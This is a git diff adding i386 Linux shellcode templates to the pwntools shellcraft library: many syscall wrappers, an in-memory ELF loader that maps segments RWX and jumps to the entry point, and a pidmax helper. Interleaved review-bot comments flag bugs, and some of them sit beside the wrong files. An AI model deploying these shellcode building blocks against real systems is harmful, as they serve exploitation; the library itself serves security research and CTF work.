diff --git a/pwnlib/shellcraft/templates/i386/linux/link.asm b/pwnlib/shellcraft/templates/i386/linux/link.asm
new file mode 100644
index 000000000..105b4fa42
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/link.asm
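Review bot: killparent.asm terminates only when `kill` returns non-zero, so it relies on EPERM once the orphaned process has been re-parented to init; that holds for an unprivileged caller, but if my reading of the kernel is right, SIGKILL aimed at pid 1 (or a PID namespace's init) is discarded while the call still returns 0 to a privileged caller, and the template then spins forever. A cheap guard is to stop at pid 1 explicitly: after `${getppid()}` add `cmp eax, 1` / `je ${done}` with a `done` label after the loop. The docstring should also spell out the blast radius: after the parent dies the process is re-parented to init or the nearest subreaper (a container's pid 1, a session manager using PR_SET_CHILD_SUBREAPER), and that is what the second iteration SIGKILLs, so the template can take down far more than "the parent".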
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="from, to"/>
+<%docstring>
+Invokes the syscall link. See 'man 2 link' for more information.
+
+Arguments:
+ from(char): from
+ to(char): to
+
+
+ ${syscall('SYS_link', from, to)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/linkat.asm b/pwnlib/shellcraft/templates/i386/linux/linkat.asm
new file mode 100644
index 000000000..99c337372
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/linkat.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fromfd, from, tofd, to, flags"/>
+<%docstring>
+Invokes the syscall linkat. See 'man 2 linkat' for more information.
+
+Arguments:
+ fromfd(int): fromfd
+ from(char): from
+ tofd(int): tofd
+ to(char): to
+ flags(int): flags
+
+
+ ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/listen.asm b/pwnlib/shellcraft/templates/i386/linux/listen.asm
new file mode 100644
index 000000000..6be300499
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/listen.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, n"/>
+<%docstring>
+Invokes the syscall listen. See 'man 2 listen' for more information.
+
+Arguments:
+ fd(int): fd
+ n(int): n
+
+
+ ${syscall('SYS_listen', fd, n)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/loader.asm b/pwnlib/shellcraft/templates/i386/linux/loader.asm
new file mode 100644
index 000000000..ca80d6793
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/loader.asm
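Review bot: link.asm names a template argument `from`, a Python keyword; Mako emits `<%page args>` as parameters of the generated render function, so the template cannot compile and `shellcraft.link` raises a SyntaxError instead of assembling. Use `<%page args="from_, to"/>` and `${syscall('SYS_link', from_, to)}`, and document the `from_` spelling in the `Arguments:` block since callers pass it by keyword. The same fix is needed in `linkat.asm` directly below, which has the same generator output.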
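Review bot: linkat.asm has the same keyword collision as link.asm: `<%page args="fromfd, from, tofd, to, flags"/>` puts the Python keyword `from` into the generated function signature, so the template fails to compile when first rendered. Rename to `from_` in both the `<%page>` line and `${syscall('SYS_linkat', fromfd, from_, tofd, to, flags)}`, and adjust the `from(char): from` entry accordingly. The syscall-template generator should map reserved words to a trailing-underscore form so this cannot recur for other architectures' copies of these files.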
@@ -0,0 +1,173 @@
+<%
+ from pwnlib.shellcraft.i386.linux import exit as exit
+ from pwnlib.shellcraft.i386.linux import mmap
+ from pwnlib.shellcraft.i386 import setregs
+
+ from pwnlib.shellcraft import common
+ from pwnlib.util.packing import unpack
+%>
+<%page args="address"/>
+<%docstring>
+Loads a statically-linked ELF into memory and transfers control.
+
+Arguments:
+ address(int): Address of the ELF as a register or integer.
+
+<%
+elf_magic = unpack('\x7fELF')
+die = common.label('die')
+load_one = common.label('load_one')
+next_phdr = common.label('next_phdr')
+"""
+Elf32_Ehdr
+ +0x0000 e_ident : unsigned char [16]
+ +0x0010 e_type : Elf32_Half
+ +0x0012 e_machine : Elf32_Half
+ +0x0014 e_version : Elf32_Word
+ +0x0018 e_entry : Elf32_Addr
+ +0x001c e_phoff : Elf32_Off
+ +0x0020 e_shoff : Elf32_Off
+ +0x0024 e_flags : Elf32_Word
+ +0x0028 e_ehsize : Elf32_Half
+ +0x002a e_phentsize : Elf32_Half
+ +0x002c e_phnum : Elf32_Half
+ +0x002e e_shentsize : Elf32_Half
+ +0x0030 e_shnum : Elf32_Half
+ +0x0032 e_shstrndx : Elf32_Half
+
+Elf32_Phdr
+ +0x0000 p_type : Elf32_Word
+ +0x0004 p_offset : Elf32_Off
+ +0x0008 p_vaddr : Elf32_Addr
+ +0x000c p_paddr : Elf32_Addr
+ +0x0010 p_filesz : Elf32_Word
+ +0x0014 p_memsz : Elf32_Word
+ +0x0018 p_flags : Elf32_Word
+ +0x001c p_align : Elf32_Word
+"""
+e_entry = 0x0018
+e_phoff = 0x001c
+e_phnum = 0x002c
+e_phentsize = 0x002a
+p_type = 0x0000
+p_offset = 0x0004
+p_vaddr = 0x0008
+p_filesz = 0x0010
+p_memsz = 0x0014
+
+
+PT_LOAD = 1
+%>
+
+ ${setregs({'esi': address})}
+
+ /* Check the ELF header */
+ mov eax, dword ptr [esi]
+ cmp eax, ${elf_magic}
+ jnz ${die}
+
+ /* Discover program headers */
+ mov eax, esi
+ add eax, dword ptr ${e_phoff}
+ mov eax, [eax]
+ add eax, esi /* eax = &program headers */
+
+ mov ebx, esi
+ add ebx, ${e_phentsize}
+ movzx ebx, word ptr [ebx] /* ebx = sizeof(program header) */
+
+ mov ecx, esi
+ add ecx, ${e_phnum}
+ movzx ecx, word ptr [ecx] /* ecx = # of program headers */
+
+1:
+ /* For 
each section header, mmap it to the desired address */
+ push esi
+ push ecx
+ push ebx
+ push eax
+ call ${load_one}
+ pop eax
+ pop ebx
+ pop ecx
+ pop esi
+ add eax, ebx
+ loop 1b
+
+ /* Everything is loaded and RWX. Find the entry point and call it */
+ mov eax, esi
+ add eax, ${e_entry}
+ mov eax, [eax]
+
+ /* Set up the fake stack.
+ /* AT_NULL */
+ xor ebx, ebx
+ push ebx
+ push ebx
+ /* AT_RANDOM */
+ push esp
+ push 25
+
+ push ebx /* envp */
+ push ebx /* argv */
+ push ebx /* argc */
+
+ /* Invoke the entry point */
+ jmp eax
+
+${load_one}:
+ push ebp
+ mov ebp, esp
+
+ /* If it's not a PT_LOAD header, don't care */
+ mov ebx, eax
+ /* add ebx, ${p_type} == zero */
+ cmp dword ptr [ebx], ${PT_LOAD}
+ jnz ${next_phdr}
+
+ /* Get the destination address into edi */
+ mov edi, eax
+ add edi, ${p_vaddr}
+ mov edi, [edi]
+
+ /* Get the size to mmap into ebx */
+ mov ebx, eax
+ add ebx, ${p_memsz}
+ mov ebx, [ebx]
+ shr ebx, 12
+ inc ebx
+
+ /* We can't move the program break with brk(),
+ so we basically have to fake it. Allocate
+ more space than we ever expect the heap to
+ need, by over-allocating space by 8x */
+ shl ebx, 12 + 4
+
+ /* Map the page in */
+ pushad
+ ${mmap('edi', 'ebx', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)}
+ /* Ignore failure */
+ popad
+
+ /* Get the source address into esi */
+ mov ebx, eax
+ add ebx, ${p_offset}
+ mov ebx, [ebx]
+ add esi, ebx
+
+ /* Get the number of bytes into ecx */
+ mov ecx, eax
+ add ecx, ${p_filesz}
+ mov ecx, [ecx]
+
+ /* Copy the data */
+ cld
+ rep movsb
+
+${next_phdr}:
+ mov esp, ebp
+ pop ebp
+ ret
+
+${die}:
+ ${exit(1)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/loader_append.asm b/pwnlib/shellcraft/templates/i386/linux/loader_append.asm
new file mode 100644
index 000000000..19c5623b9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/loader_append.asm
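Review bot: `add eax, dword ptr ${e_phoff}` is the only header-field offset in loader.asm not added as a plain immediate — `add ebx, ${e_phentsize}`, `add ecx, ${e_phnum}` and `add eax, ${e_entry}` all are — and in GAS Intel syntax a `ptr`-qualified bare constant is, as far as I know, parsed as an absolute memory operand (`DWORD PTR ds:0x1c`), which would fault on the read instead of adding 0x1c; unless the toolchain is known to treat it as an immediate it should read `add eax, ${e_phoff}`, and this may well be the undiagnosed failure behind the commented-out loader_append doctest. The `MAP_FIXED` mapping replaces whatever already lives at `p_vaddr`, including this loader and an appended image if the ELF's segments overlap the shellcode's pages, and `/* Ignore failure */` means an mmap error is followed by `rep movsb` into unmapped memory; the docstring should state that the ELF must be linked away from the loader's own address range (the `-Wl,-Ttext-segment=0x20000000` in the loader_append example is exactly that requirement), and a sign test on eax before `popad` could branch to `${die}` rather than crash. Two comment nits: `/* Set up the fake stack.` is only closed by the `*/` of the following `/* AT_NULL */` line and should get its own terminator, and `shl ebx, 12 + 4` over-allocates by 16x, not the `8x` the comment claims.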
@@ -0,0 +1,55 @@
+<%
+ from pwnlib.shellcraft.i386.linux import loader
+ from pwnlib.shellcraft import common
+%>
+<%docstring>
+Loads a statically-linked ELF into memory and transfers control.
+
+Similar to loader.asm but loads an appended ELF.
+
+Arguments:
+ data(str): If a valid filename, the data is loaded from the named file.
+ Otherwise, this is treated as raw ELF data to append.
+ If ``None``, it is ignored.
+
+Example:
+
+ >>> gcc = process(['gcc','-m32','-xc','-static','-Wl,-Ttext-segment=0x20000000','-'])
+ >>> gcc.write('''
+ ... int main() {
+ ... printf("Hello, %s!\\n", "i386");
+ ... }
+ ... ''')
+ >>> gcc.shutdown('send')
+ >>> gcc.poll(True)
+ 0
+ >>> sc = shellcraft.loader_append('a.out')
+
+The following doctest is commented out because it doesn't work on Travis
+for reasons I cannot diagnose. However, it should work just fine :-)
+
+ # >>> run_assembly(sc).recvline() == 'Hello, i386!\n'
+ # True
+
+
+<%page args="data = None"/>
+<%
+elf_data = common.label('elf_data')
+load = common.label('load')
+%>
+ jmp ${elf_data}
+${load}:
+ pop eax
+ ${loader('eax')}
+${elf_data}:
+ call ${load}
+%if data:
+<%
+import os
+
+if os.path.isfile(data):
+ with open(data, 'rb') as f:
+ data = f.read()
+%>
+ ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))}
+%endif
diff --git a/pwnlib/shellcraft/templates/i386/linux/lseek.asm b/pwnlib/shellcraft/templates/i386/linux/lseek.asm
new file mode 100644
index 000000000..8484893fe
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/lseek.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, offset, whence"/>
+<%docstring>
+Invokes the syscall lseek. See 'man 2 lseek' for more information.
+
+Arguments:
+ fd(int): fd
+ offset(off_t): offset
+ whence(int): whence
+
+
+ ${syscall('SYS_lseek', fd, offset, whence)}
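Review bot: In loader_append.asm, `os.path.isfile(data)` runs for the raw-ELF case too, and every ELF image contains NUL bytes (`\x7fELF\x01\x01\x01\x00...`); `os.stat` refuses a string with embedded NULs by raising, and on Python 2 that is a TypeError which `isfile` does not swallow, so the "treated as raw ELF data" branch the docstring promises raises instead of appending. Guard the check, e.g. `if '\x00' not in data and os.path.isfile(data):`, or better take a path and an image as distinct parameters, which also removes the ambiguity where a blob that happens to spell an existing filename is read from disk instead. Two points worth a comment: `.string` appends a terminating NUL after the image (harmless, since the loader only copies `p_filesz` bytes per segment), and with the default `data = None` the emitted code treats whatever follows `call ${load}` as the ELF, so it presumably ends in the loader's `exit(1)` after the magic check fails.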
diff --git a/pwnlib/shellcraft/templates/i386/linux/lstat.asm b/pwnlib/shellcraft/templates/i386/linux/lstat.asm
new file mode 100644
index 000000000..44e0ece0e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/lstat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="file, buf"/>
+<%docstring>
+Invokes the syscall lstat. See 'man 2 lstat' for more information.
+
+Arguments:
+ file(char): file
+ buf(stat): buf
+
+
+ ${syscall('SYS_lstat', file, buf)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/lstat64.asm b/pwnlib/shellcraft/templates/i386/linux/lstat64.asm
new file mode 100644
index 000000000..b07b06863
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/lstat64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="file, buf"/>
+<%docstring>
+Invokes the syscall lstat64. See 'man 2 lstat64' for more information.
+
+Arguments:
+ file(char): file
+ buf(stat64): buf
+
+
+ ${syscall('SYS_lstat64', file, buf)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/madvise.asm b/pwnlib/shellcraft/templates/i386/linux/madvise.asm
new file mode 100644
index 000000000..861f783db
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/madvise.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="addr, len, advice"/>
+<%docstring>
+Invokes the syscall madvise. See 'man 2 madvise' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ advice(int): advice
+
+
+ ${syscall('SYS_madvise', addr, len, advice)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/mincore.asm b/pwnlib/shellcraft/templates/i386/linux/mincore.asm
new file mode 100644
index 000000000..3855d66cf
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/mincore.asm
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mkdir.asm b/pwnlib/shellcraft/templates/i386/linux/mkdir.asm new file mode 100644 index 000000000..e85b9085d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm b/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm new file mode 100644 index 000000000..45ff7aaf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mknod.asm b/pwnlib/shellcraft/templates/i386/linux/mknod.asm new file mode 100644 index 000000000..9e30ea877 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/mknodat.asm b/pwnlib/shellcraft/templates/i386/linux/mknodat.asm new file mode 100644 index 000000000..77aaf90b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mlock.asm b/pwnlib/shellcraft/templates/i386/linux/mlock.asm new file mode 100644 index 000000000..0d5744372 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mlockall.asm b/pwnlib/shellcraft/templates/i386/linux/mlockall.asm new file mode 100644 index 000000000..87753445a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mmap.asm b/pwnlib/shellcraft/templates/i386/linux/mmap.asm new file mode 100644 index 000000000..8d5e5c268 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mmap.asm 
@@ -0,0 +1,17 @@
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="addr, length, prot, flags, fd, offset"/>
+<%docstring>
+Invokes the syscall mmap. See 'man 2 mmap' for more information.
+
+Arguments:
+ addr(void): addr
+ length(size_t): length
+ prot(int): prot
+ flags(int): flags
+ fd(int): fd
+ offset(off_t): offset
+
+
+ ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/mprotect.asm b/pwnlib/shellcraft/templates/i386/linux/mprotect.asm
new file mode 100644
index 000000000..1b51c2adb
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/mprotect.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="addr, len, prot"/>
+<%docstring>
+Invokes the syscall mprotect. See 'man 2 mprotect' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ prot(int): prot
+
+
+ ${syscall('SYS_mprotect', addr, len, prot)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm b/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm
new file mode 100644
index 000000000..59721f4d7
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="mqdes, notification"/>
+<%docstring>
+Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ notification(sigevent): notification
+
+
+ ${syscall('SYS_mq_notify', mqdes, notification)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_open.asm b/pwnlib/shellcraft/templates/i386/linux/mq_open.asm
new file mode 100644
index 000000000..04a696c0a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/mq_open.asm
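Review bot: The mmap template dispatches to `SYS_mmap2` but documents `offset(off_t)` against `man 2 mmap`, i.e. a byte offset; mmap2 on i386 takes the file offset in 4096-byte page units (`man 2 mmap2`), so a caller who passes the byte offset they would hand to libc's `mmap()` gets a mapping 4096 times further into the file, silently. Either say so in the docstring, `offset(off_t): file offset in units of 4096-byte pages (mmap2 ABI; divide a byte offset by 4096)`, or shift a constant offset right by 12 in the template before emitting the syscall. Using mmap2 is the right choice here as far as I can tell (the old i386 `SYS_mmap` takes a pointer to an argument struct rather than six registers), so only the unit needs fixing.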
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm new file mode 100644 index 000000000..f7a02f056 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm new file mode 100644 index 000000000..317ae8d29 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm new file mode 100644 index 000000000..a4f9cf2ef --- /dev/null 
+++ b/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mremap.asm b/pwnlib/shellcraft/templates/i386/linux/mremap.asm new file mode 100644 index 000000000..49b68de4d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/msync.asm b/pwnlib/shellcraft/templates/i386/linux/msync.asm new file mode 100644 index 000000000..70f0b48d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/munlock.asm b/pwnlib/shellcraft/templates/i386/linux/munlock.asm new file mode 100644 index 000000000..aaf904e45 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munlock.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/munlockall.asm b/pwnlib/shellcraft/templates/i386/linux/munlockall.asm new file mode 100644 index 000000000..114d496b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/i386/linux/munmap.asm b/pwnlib/shellcraft/templates/i386/linux/munmap.asm new file mode 100644 index 000000000..0817bf8ec --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm b/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm new file mode 100644 index 000000000..2fca43e45 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/nice.asm b/pwnlib/shellcraft/templates/i386/linux/nice.asm new file mode 100644 index 000000000..45110d1a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/i386/linux/open.asm b/pwnlib/shellcraft/templates/i386/linux/open.asm new file mode 100644 index 000000000..c4229d680 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/openat.asm b/pwnlib/shellcraft/templates/i386/linux/openat.asm new file mode 100644 index 000000000..11e65a4f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pause.asm b/pwnlib/shellcraft/templates/i386/linux/pause.asm new file mode 100644 index 000000000..0da5b8e4a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pause.asm 
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall pause. See 'man 2 pause' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_pause')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/pidmax.asm b/pwnlib/shellcraft/templates/i386/linux/pidmax.asm
new file mode 100644
index 000000000..f843e53dd
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/pidmax.asm
@@ -0,0 +1,41 @@
+<% from pwnlib.shellcraft.i386 import push, mov %>
+<% from pwnlib.shellcraft.i386.linux import syscall %>
+<% from pwnlib.shellcraft import common %>
+<%docstring>
+Retrieves the highest numbered PID on the system, according to
+the sysctl kernel.pid_max.
+
+<%
+CTL_KERN=1
+KERN_PIDMAX=55
+
+"""
+struct __sysctl_args {
+ int *name; /* integer vector describing variable */
+ int nlen; /* length of this vector */
+ void *oldval; /* 0 or address where to store old value */
+ size_t *oldlenp; /* available room for old value,
+ overwritten by actual size of old value */
+ void *newval; /* 0 or address of new value */
+ size_t newlen; /* size of new value */
+};
+"""
+%>
+ push ebp
+ ${push(0xffff)}
+ mov ebp, esp /* ebp = oldval and frame pointer R*/
+ ${push(4)}
+ mov eax, esp /* eax = oldlenp */
+ ${push(CTL_KERN)}
+ ${push(KERN_PIDMAX)}
+ mov ecx, esp /* ecx = name */
+ ${push(0)} /* newlen */
+ ${push(0)} /* newval */
+ ${push('eax')} /* oldlenp */
+ ${push('ebp')} /* oldval */
+ ${push(2)} /* nlen */
+ ${push('ecx')} /* name */
+ ${syscall('SYS__sysctl', 'esp')}
+ mov esp, ebp
+ pop eax
+ pop ebp
diff --git a/pwnlib/shellcraft/templates/i386/linux/pipe.asm b/pwnlib/shellcraft/templates/i386/linux/pipe.asm
new file mode 100644
index 000000000..6bc12d7dc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/pipe.asm
